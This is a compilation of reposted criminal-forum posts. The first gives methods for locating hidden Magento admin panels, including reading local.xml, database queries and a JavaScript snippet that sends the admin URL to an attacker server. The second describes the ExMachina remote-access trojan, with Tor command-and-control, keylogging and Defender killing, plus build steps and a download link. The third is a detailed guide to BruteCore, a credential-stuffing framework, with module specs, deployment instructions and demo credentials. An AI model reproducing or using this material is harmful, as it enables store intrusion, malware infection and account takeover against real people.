1. One of the default paths if the admin has special needs (thanks kingdomecome #comment-1099896)

httpx://{base_url}/catalog/Adminhtml_category 

2. If it is possible to read files on the host, read this file (thanks to secnull #comment-1099846)

/app/etc/local.xml 

2.1 As an addition to the previous paragraph (thanks to fout #comment-1299309)

The admin panel name is set in the config usually app/etc/local.xml or app/etc/env.php

 in the line 'backend' => 'frontName' => '[frontName]'

 Admin access: http://hostname/index.php/[frontName]/ 

tells us 3. And here is what the user winstrool , thanks to him for this (#comment-1100049)

try looking at the paths:
 /rss/catalog/notifystock/
 index.php/rss/catalog/notifystock/

 If rss is enabled, then a basic authorization will pop up there, the login pass is the same as from the admin panel, you go through authorization, there you look at the source code of the page, the path to the admin panel will be written in it 

4. If the administrator of the resource is a radish (a bad person) and changed the path to the admin area to a custom one, it makes sense to look in the database.
From personal experience, I have written down the following search anchors:

core_config
-T core_config_data --where="path='admin/url/use_custom'" -C value

и
cms_page 

5. In any case, it is worth checking this path, which I have repeatedly mentioned on the forum pages:

/downloader

 We look for the inscription return to admin and go to the authorization page 

6. I didn’t check it myself, but there was this information on the forum (thanks to gcclub #comment-814214)

There is an admin notification inbox table in Magento (something like this)
 there in it the read notice of the hectic zhs

 var xhr = new XMLHttpRequest();
 xhr.open("POST", "http://server", true);
 xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
 xhr.send(window.location.href);

 this post request code will send the full admin URL 

7. There was this topic ( /topic/126409/ ) from which we can learn a lot of useful things if we read letters with our eyes and think thoughts with our brains (thanks to 0M0H for starting the thread):

basic moments:
 1. Searching /admin, /manager, /backend, /office
 3. /index.php/rss/order/new/, we go through authorization using HTTP Basic Auth, after which we click on the order link, cookies are set, you will be in the admin panel, and even logged in, it happens that the xml is not readable in the link text view, extract the url from the “href” of the “a” tag yourself 

And this is what the path to the admin panel looks like during the installation of Magenta:

You can try to bruteforce, hehe, there are no options at all - 36^6, EMNIP.

That's all in my notes, perhaps something has escaped my attention.
If the moderators deem it necessary, please pin this topic to make it easier to find information.

Author: FHT
Source : https://forum.exploit.in/topic/225568/

Functions:
- Anonymous C2C server thanks to the Tor network
- Listen to user keyboard input
- taking screenshots
- Run PowerShell commands
- try killing Windows Defender processes

Notes that this project is not yet complete as more testing is required to bypass all existing antiviruses, so the to-do list is improving the code so that it bypasses all possible antiviruses and adding a function to run encrypted shellcode.
for the hardware you need a server for at least 4GB of ram and 2cpu cores, as for the software: Tor, nginx(optional), python, and Go
use:
set up a hidden tor server
encode the entire onionv3 address, Discord webhook and executable name because it will try to delete itself
edit main.go adding new Base64 encoded data

Bash:

cd ExMachina
GOOS=windows go build -ldflags="-w -s -H=windowsgui"

the output executable is about 6.5 MB
start the server by running python wsgi.py(for debugging and testing python test.py), register admin (default admin username is "ErenYeager", you can change it if you want) go to /register route and register admin password
enjoy

https://send.exploit.in/download/59d81dee7efd1cfa/#JSeoavfgjRanR0xx0mOllg

author : https://xss.is/members/326294/

source : xss.is

Introduction
When I first saw that a new competition was announced for the CSU, I immediately decided that I would participate. However, the question arose as to which project would be best to enter the competition with. I spent a long time choosing between writing a messenger to replace Tox with detected RCE, or writing a brute, of which I wrote a whole bunch and a cart in Delphi. But I realized that if I started making a messenger, I definitely wouldn’t have time, and I also have quite extensive experience in writing brute-forces/checkers. I wrote them for every taste and color, analyzed mobile applications, and understood encryption on various sites. Taking into account all these aspects, I understood what I would do. But the question was different, the brute must be truly unique, and not just another brute for one site with loading of the database and proxies.

Advantages:
1. Everything in one place
When you often write brutes, you end up with a whole bunch of stuff - compiled brutes with results, source codes. It's all scattered across different folders and is somehow inconvenient. And if you add some other feature to this, you have to go into each software, add it and compile it, which takes a lot of time.
2. Modern stack
Brutes are usually written in Delphi or C#, but these languages ​​are already a little outdated for this task. Or they write brutes using OpenBullet or Private Keeper, and there were a whole bunch of them, but the rest somehow didn’t catch on much. I chose Golang for its outstanding performance under high loads and efficient multithreading. It may not be the same OOP language, but it's great for the purpose.
3. Cross-platform
Most Brutes are created for Windows for the convenience of the end user. But using Golang allows you to compile it for different operating systems without problems. So, in addition to Windows, we can easily work on Linux servers, which adds flexibility and versatility.
4. Web-face instead of GUI
Those who brute usually use dedicated Windows servers, managing them via RDP. It's expensive and not always convenient. Working with Brute as a website is much more convenient. You open a tab in the browser and work there.
5. Saving all settings to presets
In order not to enter the settings again each time, I implemented presets. Specify the source of the proxy, their type, and then you simply select this preset. The remainder is also saved, the results can be downloaded in txt or xlsx format. Also, if the brute force was stopped for any reason, it can be restarted and there is no need to take the rest, stuff it in a new one and register all the settings again, which, in my opinion, is also very convenient.
6. No kernel restrictions for developers
Universal Brutes impose certain restrictions on project developers. My module is a microservice with one endpoint, and it can be written in any compiled language. Input data into it, it performs its magic and says good, bad, error and so on. No kernel restrictions for developers.

Instructions for use
The algorithm for using the program is approximately the following:

1. Loading the bazooka
2. Create a new proxy preset
3. Load the module
4. Create a session, select what you created above and then start.

Now let's go over each point in more detail.
Combo sheets

To make storing databases easier, I added the ability to create folders and group databases within them. Considering that there can be many databases and on different topics, this will make navigation easier. Just right-click on an empty space and select "Create Folder" or "Create Combo List".

To create a folder, just enter the name of the folder in the modal window that appears after clicking the right mouse button.

The combo sheet works a little differently. It allows you to combine multiple files or links to form one common list. For example, you can specify a file on the server and a link to Sendspace, where the database is also stored, and get one combo sheet with data from several sources. You can also provide one link or file, depending on your convenience. When creating a combo sheet, you need to specify the type of data that will be included in it.

For now, you can currently only provide direct links to files, which is really convenient if your databases are stored in the cloud. The second option is loading databases from a file that is located on the same machine where the software is running. I have not yet made it possible to select a file from the car where the user is sitting. I decided not to enable this feature for now because I know that some users download huge databases with several million rows and leave it overnight. It would be quite difficult to load such large databases here, so I decided to postpone this function for later. However, if you run the software on the same machine where you are, then specifying the path to the file does not pose a problem.

If you want to delete a folder, you must first delete its nested items. If you want to delete a combo sheet, there should not be any sessions associated with it. If there is a cloud on the FO, the software will not bypass it, so make sure that there is no cloudflare on the resource where the bazka is uploaded.

Proxy presets

Here it looks something like this; in fact, it has a certain similarity with combo sheets, only here I didn’t make folders. As a rule, proxies are loaded either from a file, different each time, or via the API link of various services such as advances, bests or ABM, generally according to taste and color... and there they are updated in real time with some frequency. There have also been cases when proxies are written to a file on disk and updated from it with a certain frequency in the brute force. In this regard, it is convenient to use presets. In case this is a one-time download from a file in which the proxies will quickly die, then you can not create a preset, but immediately load the proxy in the session, for this there is a separate button in the sessions, select it and load your file from the disk there.

But let's get back to the presets.

When using a preset to load a proxy from a link or from a file on disk, you specify the name of the preset. If the proxies will be updated at a certain frequency, you check the box next to the interval and specify the time in seconds.
The website connection timeout for a proxy is meant as usual; this is the time it takes to wait for a response from the server when connecting to it.
As with combo lists, you can specify multiple sources from which proxies will be taken. If the file is on your car, then proxy auto-update will not work for it, and the program will always take data from the file you downloaded. This is quite logical.
Auto-update will be active for deleted files and links. You can choose several proxy types: HTTP/S, SOCKS4, SOCKS5. This means that several different types of proxies can be used at once in one brute session. This is convenient because you can specify several links with different types of proxies, and the program will use them all together.

Modules

Actually, the tab itself is very simple, you click add, load the module file and it pulls it into this tab. But how to make the modules themselves is a different story.
A module is an independent microservice with its own writing specification. Although the module can be written in any programming language, I would still recommend using Go because it compiles into a single executable and is easy to run on any platform. However, it should be remembered that if your BruteCore is running on Linux, then the module must also be compiled for Linux, and similarly for Windows.
When you load a module, it is run with the "-getinfo" option and the module should return JSON in the following format:

{
    "name": "TestModule", 
    "version": "1.0.0.0",
    "author": "0xUser",
    "data_type": 9
}

The "data_type" field determines the data type of the combo sheet that the module works with. Here are the possible values:

4   DATA_TYPE EMAIL
5   DATA_TYPE USERNAME
6   DATA_TYPE PASSWORD
7   DATA_TYPE PIN
8   DATA_TYPE USERNAME:PASSWORD
9   DATA_TYPE EMAIL:PASSWORD
10  DATA_TYPE DATA

All of the above types can be found in the reference table in the database, which lies next to the project. If any field from the above json format is not in the module, BruteCore will set the value to none, as in the picture above in the “Version” field. The modules themselves are saved in the modules folder next to the software.
If any field from the above JSON is missing from the module, BruteCore will set its value to "none".
Modules are saved in the "modules" folder next to the program.
When running a module for brute force, it is called with the "-port" argument indicating the port on which the microservice should be run.
The module must have a POST endpoint "/ExecuteModule" that accepts JSON in the following format:

{
  "email": "0xUser@0xuser.cf",
  "username": "0xUser",
  "password": "xss.password",
  "pin": "1234",
  "data": "example_data",
  "timeout": 15000,
  "proxy_host": "127.0.0.1",
  "proxy_port": 8080,
  "proxy_type": 18
}

Almost all fields are optional. Almost all fields are optional, some of them may be missing, for example, if the brute force goes without a proxy, then there will be no corresponding fields in json; if type 9 of the combo list was selected, then the email and password fields will be present and, accordingly, for different types of combo list . The service performs certain actions with the data and returns JSON of the following form:

{
  "status": 25,
  "log": "proxy: 127.0.0.1:8080 \n some additional data in log"
}

The log field is optional and can, in principle, be absent if you do not need it. The status can have the following meanings:

25  RESULT  Хорошие
26  RESULT  Плохие
27  RESULT  Ошибки Соединения
28  RESULT  Ошибки ПО
29  RESULT  Капча
30  RESULT  С балансом
31  RESULT  Пустышки
32    RESULT    Зарегестрирован
33    RESULT    Залимиченные

In theory, all the main work is done by modules, BrutCore itself acts as a kind of orchestrator that launches the required service, maintains it in working order, sends input data to it, then modular magic happens, “special physical and mathematical calculations” as a result of which we and we’ll find out whether it’s bad or something else.
IMPORTANT!! Since we are already working with compiled modules, there may be all sorts of “bookmarks”, because here there are absolutely no restrictions for the developer in terms of what code to write, what libraries to use, etc., so you should be very careful and use only trusted modules people, or write modules yourself. God protects the careful!
Below in the article you can find an example of a ready-made module and use it as a template for writing your own modules.

Sessions

In sessions everything is relatively simple, you create a new session using the add button, then click on the arrow on the right and go to the details of a specific session.

Select the combo list that you want to brute, after which you can select a proxy either from a ready-made preset, or download it from a file that is on the car you are connecting with. If you want to brute without a proxy, then you don’t select anything and the brute will go without a proxy. Select the module, enter the number of threads you need and launch it.

It is generally not advisable to change the proxy list, combo sheet or module during the search. But you can change the number of threads while working; the software will automatically pick up the number of threads and, if necessary, get rid of unnecessary ones, or create new ones that do not remain. To get statistics on the brute, you need to click on the update button to the right of the word statistics, but perhaps this is not convenient, maybe you should have made it update the statistics via websockets, well, I don’t want to put an additional load on the software. The results can be viewed accordingly by clicking on the results button, the next view will open.

Actually, here is the usual pagination based on the results, choose what you want to see, how many records should be displayed at once, and then look.

The result can be downloaded in other formats, either txt or xlsx, I think anyone who has worked with Excel will definitely check it out. If there were any logs from the beeps, they will be in the right column with the log. It depends on the project you are launching.
Instructions for use

Install Node.js from the official website https://nodejs.org/en/download .
Install Vue-cli with the command npm install -g @vue/cli.
Install Golang from the official website https://go.dev/doc/install .
Download the source code for the frontend and backend.
In the folder with the front, run npm i in the folder with the back go mod tidy and go mod vendor.
If you plan to run BruteCore locally on your car, then you need to do the following:

1. In the front folder, run the command npm run serve
2. In the backing folder, run the go run command.
3. Go to localhost:8080 in your browser
4. done

If you run BruteCore on the server, you need to do the following:

1. In the folder with the front, in the file src\main.js, on line 12, change http://127.0.0.1:985 to your domain or server address (for example: http://0xuser.cf , http://255.255.255.255 )
2. In the folder with the front, run npm run build, the view will collect all the sources and a dist folder will be created, which will contain everything necessary for the front.
3. In the folder with the backend source, in the “.env” file we change the values ​​of AUTH_ADMIN_LOGIN, AUTH_ADMIN_PASSWORD, AUTH_VIEWER_LOGIN, AUTH_VIEWER_PASSWORD, JWT_KEY to our own, we also need to change the value of JWT_KEY to any string, this is the key with which jwt tokens will be encrypted on the server.
4. In the backing folder we set the environment variables “set goos=linux, set goarch=amd64”, if your server has some other architecture, then indicate your architecture.
5. We assemble the backing with the command “go build main.go”

As a result, we have a dist folder with a front and an executable file for Linux with a backend. Now we go to our server and update the packages available on it to the latest version with the commands:
sudo apt update
sudo apt upgrade
We roll up nginx with the command:
sudo apt nginx
Copy the contents of the dist folder to the /var/www/front.brutecore folder
Copy the compiled main, .env, BruteCore.sqlite to the /var/www/back.bruteforce folder
Afterwards we run the command chmod +x main
In the /etc/nginx/sites-available folder, create a brutecore file with the following contents, where server_name localhost, “localhost” is changed to your domain or server address:

server {
    listen      80;
    server_name localhost;
    charset utf-8;
    root    /var/www/front.brutecore;
    index   index.html;

    #Always serve index.html for any request
    location /Health { 
        proxy_pass http://127.0.0.1:985/Health;
    }

    location /api {
        proxy_pass http://127.0.0.1:985/api;
    }   

    location / {
        root /var/www/front.brutecore;
        try_files $uri  /index.html;
    }

    error_log  /var/log/nginx/vue-app-error.log;
    access_log /var/log/nginx/vue-app-access.log;
}

Next we run the command:
sudo ln -s /etc/nginx/sites-available/brutecore /etc/nginx/sites-enabled/
We also edit the /etc/nginx/nginx.conf file
We find these lines and uncomment them

We also need to add the line next to it: client_max_body_size 20M;
This is necessary for nginx to compress styles and other scripts, and also so that we can upload modules to the server without any problems.

Restart nginx with the command: sudo systemctl restart nginx
Then we launch the backend with Komagda sudo nohup ./main &, and go in the browser to the address of our server or domain. If everything was done correctly, the login window should appear and we can log in without any problems.
If after logging into your Account you receive the error “failed to initialize database, got error Binary was compiled with 'CGO_ENABLED=0', go-sqlite3 requires cgo to work. “This is a stub” then you need to install goshka on the server, then install the gcc/g++ compiler there with the command sudo apt-get install build-essentialand then build the application on the server and it will work.

All sources can be downloaded from the link https://www.sendspace.com/file/2ujpbd
I specially deployed the demo so that you could see what it looks like already deployed http://45.83.122.198/ Login XSSViewer, Password: xss.is1pass

author : 0xUser

source xss : /threads/107438/

Enjoy !

@Bl4nk_Room